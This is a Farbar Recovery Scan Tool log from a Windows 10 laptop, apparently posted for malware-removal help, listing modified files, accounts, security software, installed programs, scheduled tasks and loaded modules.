2016-02-09 13:01 - 2016-01-26 23:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll
2016-02-09 13:01 - 2016-01-26 22:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-09 13:01 - 2016-01-26 22:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-09 13:01 - 2016-01-26 22:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-09 13:01 - 2016-01-26 22:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-02-09 13:01 - 2016-01-26 22:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 20:34 - 2014-07-07 11:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-09 20:33 - 2013-12-13 19:44 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\AuthenTec
2016-03-09 20:32 - 2015-09-01 10:45 - 00000000 __SHD C:\Users\levilaing\IntelGraphicsProfiles
2016-03-09 20:31 - 2014-07-07 11:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-09 19:44 - 2013-09-13 15:32 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-09 19:39 - 2016-01-06 10:04 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2016-03-09 19:31 - 2015-12-19 19:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-09 19:30 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-09 19:30 - 2015-10-30 00:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-09 19:28 - 2015-10-30 01:21 - 00000000 ____D C:\WINDOWS\INF
2016-03-09 19:25 - 2015-12-19 19:15 - 04967824 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-09 18:52 - 2015-03-31 19:40 - 00000000 ____D C:\Program Files (x86)\Fitbit Connect
2016-03-09 18:20 - 2013-09-16 08:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-09 18:16 - 2013-09-16 08:59 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-03-09 18:15 - 2015-10-30 01:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-09 17:47 - 2014-07-07 11:35 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-09 17:34 - 2014-07-08 15:30 - 00000000 ____D C:\Users\levilaing\AppData\Local\Adobe
2016-03-09 16:46 - 2015-12-19 19:25 - 00000000 ____D C:\Users\levilaing
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files\Google
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-09 16:45 - 2015-09-03 10:03 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\Temp
2016-03-09 16:36 - 2015-10-30 00:28 - 00008192 ___SH C:\WINDOWS\system32\config\ELAM
2016-03-09 16:26 - 2015-09-01 10:51 - 00002416 _____ C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-03-09 16:26 - 2013-12-13 17:53 - 00000000 __RDO C:\Users\levilaing\SkyDrive
2016-03-09 10:07 - 2015-10-30 01:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 16:57 - 2013-09-13 13:01 - 00000000 ____D C:\Users\levilaing\AppData\Local\Packages
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Users\levilaing\AppData\Local\Google
2016-03-08 16:54 - 2014-01-16 14:20 - 00000000 ____D C:\ProgramData\Google
2016-03-08 16:53 - 2012-12-20 18:47 - 00000000 ____D C:\Program Files (x86)\CyberLink
2016-03-08 16:53 - 2012-12-20 18:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 16:52 - 2012-12-20 18:46 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-03-08 16:51 - 2015-09-28 19:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2016-03-08 16:50 - 2015-09-28 19:17 - 00000000 ____D C:\Program Files\Canon
2016-03-08 16:50 - 2014-01-21 17:04 - 00000000 ____D C:\Program Files (x86)\Canon
2016-03-07 17:19 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\rescache
2016-03-01 13:45 - 2015-12-19 19:24 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 13:40 - 2012-12-20 19:23 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-01 13:33 - 2015-10-30 03:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 __RSD C:\WINDOWS\Media
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-03-01 13:27 - 2015-12-24 12:27 - 00000000 ____D C:\ProgramData\Norton
2016-03-01 08:26 - 2015-12-07 08:59 - 00002005 _____ C:\Users\levilaing\Desktop\Dashlane.lnk
2016-03-01 08:26 - 2015-12-07 08:58 - 00000000 ____D C:\Users\levilaing\AppData\Roaming\Dashlane
2016-02-29 13:22 - 2013-09-13 13:11 - 00000000 ____D C:\Users\levilaing\AppData\Local\ElevatedDiagnostics
2016-02-23 16:21 - 2015-12-15 14:22 - 00000000 ____D C:\Users\levilaing\Desktop\Tor Browser
2016-02-17 19:42 - 2014-10-21 09:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\ProgramData\Oracle
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-17 19:41 - 2016-01-05 13:15 - 00000000 ____D C:\Users\levilaing\.oracle_jre_usage
2016-02-17 19:41 - 2014-10-21 09:58 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-17 19:18 - 2016-01-05 13:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-16 13:23 - 2016-01-05 13:36 - 00000000 ____D C:\Users\levilaing\AppData\Local\CrashDumps
2016-02-12 18:00 - 2013-12-24 11:04 - 00000000 ____D C:\Program Files (x86)\HP SimplePass
2016-02-09 14:04 - 2013-08-22 07:25 - 00000167 _____ C:\WINDOWS\win.ini
2016-02-09 09:02 - 2013-09-16 14:19 - 00000000 ____D C:\Users\levilaing\Documents\Youcam

==================== Files in the root of some directories =======

2015-12-18 17:54 - 2015-12-18 17:54 - 0001035 _____ () C:\Program Files (x86)\suit.log
2014-04-18 15:32 - 2014-04-18 15:32 - 0007168 _____ () C:\Users\levilaing\AppData\Roaming\SQLiteManager3.pref
2014-02-04 20:57 - 2014-02-04 20:57 - 0000045 _____ () C:\Users\levilaing\AppData\Roaming\WB.CFG
2014-05-23 10:53 - 2014-05-23 10:53 - 0002165 _____ () C:\Users\levilaing\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\levilaing\AppData\Local\Temp\sqlite3.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-03-02 03:16

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by levilaing (2016-03-09 20:37:17)
Running from C:\Users\levilaing\Desktop
Windows 10 Home Version 1511 (X64) (2015-12-20 01:54:43)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-1018505005-2824899964-3694806622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1018505005-2824899964-3694806622-503 - Limited - Disabled)
Guest (S-1-5-21-1018505005-2824899964-3694806622-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1018505005-2824899964-3694806622-1005 - Limited - Enabled)
levilaing (S-1-5-21-1018505005-2824899964-3694806622-1001 - Administrator - Enabled) => C:\Users\levilaing

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.5.146 - Adobe Systems, Inc.)
AuthenTec TrueAPI 64-bit (Version: 1.6.0.87 - AuthenTec, Inc.) Hidden
BioExcess (Version: 6.5.5.20 - Egis Technology Inc.) Hidden
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 4.0.0 - Canon Inc.)
Canon MG2500 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG2500_series) (Version: 1.00 - Canon Inc.)
Canon MG2500 series On-screen Manual (HKLM-x32\...\Canon MG2500 series On-screen Manual) (Version: 7.6.1 - Canon Inc.)
Canon MG2500 series User Registration (HKLM-x32\...\Canon MG2500 series User Registration) (Version: - ‭Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.2.1 - Canon Inc.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.3.2527 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.3.2606 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dashlane (HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Dashlane) (Version: 4.1.0.99957 - Dashlane SAS)
DVD Flick 1.3.0.7 (HKLM-x32\...\DVD Flick_is1) (Version: 1.3.0.7 - Dennis Meuwissen)
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Fitbit Connect (HKLM-x32\...\{E54705FB-98A6-4C03-B2DC-D8C3B5486DCD}) (Version: 2.0.0.6512 - Fitbit Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP 3D DriveGuard (HKLM\...\{54CE68A8-4F2D-4328-B1F7-D6C720405F7F}) (Version: 4.2.9.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{59F8C5AA-91BD-423D-BF05-09A80F39898F}) (Version: 2.10.62 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{E5823036-6F09-4D0A-B05C-E2BAA129288A}) (Version: 3.0.6 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\{4BACA3B8-F63A-44ED-9A8D-48B4D02AD268}) (Version: 6.0.100.276 - Hewlett-Packard)
HP SimplePass Identity Protection (HKLM-x32\...\InstallShield_{E6CB67CC-71D2-46b9-8D43-A4641A9EECB2}) (Version: 6.5.5.20 - Egis Technology Inc.)
HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{23CCE784-A812-4647-AEFF-1DCCD4E57478}) (Version: 11.50.0000 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6425.0 - IDT)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Media Suite (x32 Version: 10 - CyberLink Corp.) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
Norton Security (HKLM-x32\...\NS) (Version: 22.5.5.15 - Symantec Corporation)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.29034 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.95 - Synaptics Incorporated)
Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wondershare Video Converter Free(Build 6.5.1.0) (HKLM-x32\...\Wondershare Video Converter Free_is1) (Version: 6.5.1.0 - Wondershare Software)
Yahoo Browser Settings (HKLM-x32\...\Yahoo Browser Settings) (Version: - Yahoo! Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {099EA545-0C53-45B7-AB54-CA2018855CAF} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
Task: {164BC185-5AC3-49DD-9D98-0BA405318464} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {1BEA3822-8B93-4F5B-B436-4811FCB531F5} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2012-11-05] (Hewlett-Packard Development Company, L.P.)
Task: {1C58E21A-1171-40B6-B0B7-1546A27AA771} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2012-07-24] (CyberLink Corp.)
Task: {20FA2EF3-2447-4E52-8307-A684ED67C840} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {2BDE1E7E-8AA4-4DDB-82C2-DB181FDEED54} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {69B68B87-4EE3-45A7-A72C-A1EFFF4CEBC1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {78A8E711-9886-4157-AE31-7E585AAB241A} - System32\Tasks\[email protected] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-20] (Adobe Systems Incorporated)
Task: {82B26FB7-DABB-47F1-8079-1229C6C723B6} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {A5169291-4386-4125-8918-37E485684151} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {A6D352C7-BEDD-458F-81CB-152C8FEBAC74} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {AC20895B-0994-4365-8AE9-4EA91DCA9545} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\WSCStub.exe [2015-11-20] (Symantec Corporation)
Task: {B2AF2465-3FB6-4AB9-8916-8064970A2792} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {D0FDAB6C-C95E-48AB-AA04-97C7CBD08F91} - System32\Tasks\Atofcuuu => C:\PROGRA~1\PHRASE~1\Aluts.bat
Task: {E4FAE6DB-741C-4D03-88F4-5CF3AD1ED864} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {F46D7244-6DB6-42B8-9D4C-734C1F747184} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {FBE6FA96-A961-4CE0-A0B4-89A6B663D7BA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-09-28 19:29 - 2012-03-27 21:49 - 00140456 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2012-09-06 03:47 - 2012-09-06 03:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe
2015-10-30 01:18 - 2015-10-30 01:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-06-07 05:16 - 2013-06-07 05:16 - 04073768 _____ () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
2015-12-19 20:59 - 2015-12-19 20:59 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 06:11 - 2016-02-29 09:24 - 00227712 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
2016-01-13 06:11 - 2016-02-29 09:24 - 00285568 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
2016-01-21 12:55 - 2016-01-21 12:55 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-02 11:28 - 2016-03-02 11:28 - 01506304 _____ () C:\Program Files\WindowsApps\Microsoft.People_10.0.10500.0_x64__8wekyb3d8bbwe\People.BackgroundTasks.dll
2012-12-20 18:30 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
